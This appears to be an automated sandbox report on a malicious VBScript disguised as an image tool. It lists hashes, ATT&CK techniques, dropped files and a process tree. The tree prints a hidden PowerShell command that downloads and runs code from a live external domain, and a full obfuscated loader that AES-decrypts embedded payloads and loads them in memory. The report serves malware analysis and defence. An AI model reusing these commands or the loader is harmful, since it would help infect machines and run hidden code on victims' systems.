6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff

General

Target

Turbo Generator_Pictures & Drawing.vbs
Size

78KB
MD5

870907ad00a8f53e022f042c92727d34
SHA1

8789f00e533da9b0a8bd380b9264cfaefe8ff7bc
SHA256

6ddb80d5f672a132f45f9a0114d465aa35bb7d3b31aca5473b42a7174eb018ff
SHA512

32fbacd4338eced63990c4e0f7327fc3fc4282d497e95724445476f42acf8c1378238d345e5ba53afe86e39d860643657523b42cc5982832162e75cd7d68cde1
SSDEEP

1536:KbiY5vZc5xg80mnBAH5JQGnDc3GiXs/P0Uese0A+giS5+p:giUvQYONp3Gi8/PW0Ats

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
316	powershell.exe
2820	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
316	powershell.exe
2820	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1032 wrote to memory of 316	1032	WScript.exe	28
PID 1032 wrote to memory of 316	1032	WScript.exe	28
PID 1032 wrote to memory of 316	1032	WScript.exe	28
PID 1032 wrote to memory of 2776	1032	WScript.exe	32
PID 1032 wrote to memory of 2776	1032	WScript.exe	32
PID 1032 wrote to memory of 2776	1032	WScript.exe	32
PID 2776 wrote to memory of 2520	2776	cmd.exe	34
PID 2776 wrote to memory of 2520	2776	cmd.exe	34
PID 2776 wrote to memory of 2520	2776	cmd.exe	34
PID 2776 wrote to memory of 2820	2776	cmd.exe	35
PID 2776 wrote to memory of 2820	2776	cmd.exe	35
PID 2776 wrote to memory of 2820	2776	cmd.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Turbo Generator_Pictures & Drawing.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:316
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nVzb+ZnULdRKJ8Pt1u0INEzxzJ9SAW0T4lv8svV35z4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1TJD7feNK15qiqdG0L0ERw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FnHYa=New-Object System.IO.MemoryStream(,$param_var); $tuGjJ=New-Object System.IO.MemoryStream; $ZPygJ=New-Object System.IO.Compression.GZipStream($FnHYa, [IO.Compression.CompressionMode]::Decompress); $ZPygJ.CopyTo($tuGjJ); $ZPygJ.Dispose(); $FnHYa.Dispose(); $tuGjJ.Dispose(); $tuGjJ.ToArray();}function execute_function($param_var,$param2_var){ $PWDPu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rNYVG=$PWDPu.EntryPoint; $rNYVG.Invoke($null, $param2_var);}$mhqzu = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $mhqzu;$nhfYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($mhqzu).Split([Environment]::NewLine);foreach ($JOXWc in $nhfYw) { if ($JOXWc.StartsWith('gVggYAWWcClzlgdUqYRt')) { $eTtfZ=$JOXWc.Substring(20); break; }}$payloads_var=[string[]]$eTtfZ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:2520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
70KB

MD5
b5d7889efc929af61649d13f17bf26ad

SHA1
44b1bb834ad5b3566dd4c758995bbedb2c2ba6b6

SHA256
3490b5a8d583c702b69506a047fc21135758b8dde44d77b9d102c3e4d4a4de01

SHA512
193db0b92d1595c8cfd3ecb31dd8cc2a23e3701319418a1b465bf0bc87c2708aedcd49b099bd6fe202bcca7a24f3df9bb792280abe95dce535e32f2f7ade4c3b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
665f44c7068eae62e68eef5377ffb865

SHA1
f603459dac41d6ddabae525bfdba5cfe0fa19462

SHA256
3a20be216810de69ba39e6f0c16c120bd7a979cc4dfd9eb0d0adfab672058dea

SHA512
413378e454230a0b09d16e7c832b1fb4503c750f45f88701833d367f658428ff7be9cc41a77423f7ac9d61839f109a0bded86a5d4a02d8487c44e2089ccdd004

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QQBA2FWC2N1QARJMJTMV.temp

Filesize
7KB

MD5
bc9f00ea7d94e375c3fe6868af92a177

SHA1
1ca145bf8cd798c4f20361b47968e15e409ac8dc

SHA256
266748b3011178f7f1ab6dc67c35ad075a1ecff72336e46f3a848be86d425c31

SHA512
d852bfd109ca167c656e48a9aaf73f78ca3a93a269b320b9a9ae84df4978db920354c7d247404d2c383afb7cc4953fca06288f6b504dd3da8dd2d9347d4249a2

Download Submit
memory/316-7-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Filesize
9.6MB

Download
memory/316-9-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Filesize
9.6MB

Download
memory/316-8-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Filesize
9.6MB

Download
memory/316-11-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Filesize
9.6MB

Download
memory/316-12-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Filesize
9.6MB

Download
memory/316-10-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp

Filesize
9.6MB

Download
memory/316-4-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp

Filesize
4KB

Download
memory/316-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/316-5-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download
memory/2820-28-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2820-29-0x0000000001E20000-0x0000000001E28000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing